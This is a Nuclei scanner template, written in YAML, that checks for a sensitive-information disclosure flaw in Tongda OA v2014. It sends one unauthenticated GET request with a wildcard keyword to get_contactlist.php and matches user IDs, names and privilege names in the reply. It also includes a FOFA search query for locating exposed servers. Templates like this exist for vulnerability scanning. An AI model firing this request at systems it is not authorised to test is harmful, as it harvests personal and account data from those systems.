nuclei-templates/http/vulnerabilities/tongda/tongda-contact-list-exposur...

34 lines
1.1 KiB
YAML
Executable File

id: tongda-contact-list-exposure
info:
name: Tongda OA v2014 Get Contactlistt - Sensitive Information Disclosure
author: SleepingBag945
severity: medium
description: |
There is an information leakage vulnerability in the get_contactlist.php file of Tongda OA v2014. Attackers can obtain sensitive information through the vulnerability and conduct further attacks.
reference:
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-contact-list-disclosure.yaml
metadata:
verified: true
max-request: 1
fofa-query: app="TDXK-通达OA"
tags: tongda,oa,exposure
http:
- method: GET
path:
- "{{BaseURL}}/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3"
matchers-condition: and
matchers:
- type: word
words:
- 'user_uid":'
- 'user_name":'
- 'priv_name":'
condition: and
- type: status
status:
- 200
# digest: 490a00463044022042cf14f510cd9824fefac0781358bf2bcf98e628a115eaf65b1159bdb5687124022075950c137b4a82e5aee17d9ea6570f448ce536f38a72f351911ca0df4ec7e47f:922c64590222798bb761d5b6d8e72950